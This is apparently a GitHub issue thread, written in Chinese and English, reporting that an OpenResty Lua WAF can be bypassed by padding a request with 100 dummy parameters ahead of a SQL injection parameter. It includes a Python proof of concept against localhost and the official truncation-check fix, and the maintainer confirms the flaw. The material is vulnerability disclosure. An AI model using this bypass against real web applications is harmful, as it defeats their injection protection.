args block can be bypassed because of the lack of error handle

[algtm]

get_post_args 和 get_uri_args 默认只取前100个参数。 如果攻击者提交100个无用参数，再接上注入的参数，将绕过waf。 漏洞证明python脚本：

import requests
args='a=1'+'&a=1'*99
sqli='b=select*from'
r1 = requests.get('http://127.0.0.1/?'+sqli)
print r1.url
print r1.status_code
#返回403
r2 = requests.get('http://127.0.0.1/?'+args+'&'+sqli)
print r2.url
print r2.status_code
#返回200

官方建议是使用以下代码拒绝参数过多的请求

local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
 end

[algtm]

get_post_args and get_uri_args will only return 100 args by default If attacker add 100 args before actual attack argument,waf will be bypassed。 POC in python：

import requests
args='a=1'+'&a=1'*99
sqli='b=select*from'
r1 = requests.get('http://127.0.0.1/?'+sqli)
print r1.url
print r1.status_code
#403
r2 = requests.get('http://127.0.0.1/?'+args+'&'+sqli)
print r2.url
print r2.status_code
#200

The official doc's advice is to use the following code to rejected the request。

local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
 end

[alexazhou]

多谢，这确实是个漏洞，欢迎你提交 pr 来修复，或者我过段时间不忙了会来修复这个

[Ofirnir123]

Is this issue already fixed ? Kind regards!